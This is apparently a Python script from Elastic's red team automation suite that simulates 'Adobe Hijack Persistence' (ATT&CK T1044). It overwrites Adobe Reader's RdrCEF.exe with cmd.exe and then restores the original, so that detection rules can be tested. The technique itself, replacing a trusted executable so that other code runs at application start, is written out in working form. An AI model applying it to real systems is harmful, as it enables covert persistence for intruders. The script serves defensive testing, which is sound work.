a0d3b4bd23
Co-Authored-By: Brent Murphy <56412096+bm11100@users.noreply.github.com> Co-Authored-By: Daniel Stepanic <57736958+dstepanic17@users.noreply.github.com> Co-Authored-By: David French <56409778+threat-punter@users.noreply.github.com> Co-Authored-By: Joe Desimone <56411054+joe-desimone@users.noreply.github.com> Co-Authored-By: Justin Ibarra <brokensound77@users.noreply.github.com>
47 lines
1.4 KiB
Python
47 lines
1.4 KiB
Python
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
|
|
# or more contributor license agreements. Licensed under the Elastic License;
|
|
# you may not use this file except in compliance with the Elastic License.
|
|
|
|
# Name: Adobe Hijack Persistence
|
|
# RTA: adobe_hijack.py
|
|
# ATT&CK: T1044
|
|
# Description: Replaces PE file that will run on Adobe Reader start.
|
|
|
|
import os
|
|
|
|
from . import common
|
|
|
|
|
|
@common.requires_os(common.WINDOWS)
|
|
def main():
|
|
rdr_cef_dir = "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF"
|
|
rdrcef_exe = os.path.join(rdr_cef_dir, "RdrCEF.exe")
|
|
cmd_path = "C:\\Windows\\System32\\cmd.exe"
|
|
backup = os.path.abspath("xxxxxx")
|
|
backedup = False
|
|
|
|
# backup original if it exists
|
|
if os.path.isfile(rdrcef_exe):
|
|
common.log("{} already exists, backing up file.".format(rdrcef_exe))
|
|
common.copy_file(rdrcef_exe, backup)
|
|
backedup = True
|
|
else:
|
|
common.log("{} doesn't exist. Creating path.".format(rdrcef_exe))
|
|
os.makedirs(rdr_cef_dir)
|
|
|
|
# overwrite original
|
|
common.copy_file(cmd_path, rdrcef_exe)
|
|
|
|
# cleanup
|
|
if backedup:
|
|
common.log("Putting back backup copy.")
|
|
common.copy_file(backup, rdrcef_exe)
|
|
os.remove(backup)
|
|
else:
|
|
common.remove_file(rdrcef_exe)
|
|
os.removedirs(rdr_cef_dir)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
exit(main())
|